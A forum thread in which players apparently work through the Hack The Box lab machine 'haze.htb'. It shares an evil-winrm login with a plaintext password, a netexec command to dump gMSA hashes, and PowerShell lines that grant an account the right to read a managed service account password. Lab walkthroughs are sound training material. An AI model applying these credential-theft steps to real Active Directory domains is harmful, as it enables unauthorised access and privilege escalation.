[potato_moose]

evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb

[kyakeiuwu]

did someone get anything?

[jaybit]

besides mark.adams being in gMSA_Managers, nothing.

[machakilos]

how did u get this password for paul ? seems uncrackable through hashcat

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Reposting hidden content for free

[pop10189]

besides mark.adams being in gMSA_Managers, nothing.

you can extract GMSA account hash, then that account can add owner to Support_Services group which i dont know tf i could do with this group

[kyakeiuwu]

besides mark.adams being in gMSA_Managers, nothing.

you can extract GMSA account hash, then that account can add owner to Support_Services group which i dont know tf i could do with this group

I was not able to do that. Can you tell how?

[pop10189]

besides mark.adams being in gMSA_Managers, nothing.

you can extract GMSA account hash, then that account can add owner to Support_Services group which i dont know tf i could do with this group

I was not able to do that. Can you tell how?

look for GMSA section https://notes.qazeer.io/active-directory...exploiting

 Then extract the GMSA using netexec ldap -u mark... -p .... --gmsa

[kyakeiuwu]

besides mark.adams being in gMSA_Managers, nothing.

you can extract GMSA account hash, then that account can add owner to Support_Services group which i dont know tf i could do with this group

I was not able to do that. Can you tell how?

look for GMSA section https://notes.qazeer.io/active-directory...exploiting

 Then extract the GMSA using netexec ldap -u mark... -p .... --gmsa

Account: Haze-IT-Backup$      NTLM:

I literally got this as the hash no NTLM

[pop10189]

besides mark.adams being in gMSA_Managers, nothing.

you can extract GMSA account hash, then that account can add owner to Support_Services group which i dont know tf i could do with this group

I was not able to do that. Can you tell how?

look for GMSA section https://notes.qazeer.io/active-directory...exploiting

 Then extract the GMSA using netexec ldap -u mark... -p .... --gmsa

Account: Haze-IT-Backup$      NTLM:

I literally got this as the hash no NTLM

First you need to add your self as a member to read Gmsa

[whaleflight]

besides mark.adams being in gMSA_Managers, nothing.

you can extract GMSA account hash, then that account can add owner to Support_Services group which i dont know tf i could do with this group

I was not able to do that. Can you tell how?

look for GMSA section https://notes.qazeer.io/active-directory...exploiting

 Then extract the GMSA using netexec ldap -u mark... -p .... --gmsa

Account: Haze-IT-Backup$      NTLM:

I literally got this as the hash no NTLM

Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
$user = Get-ADUser -Identity "mark.adams"
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword $user.DistinguishedName

then gMSADumper should work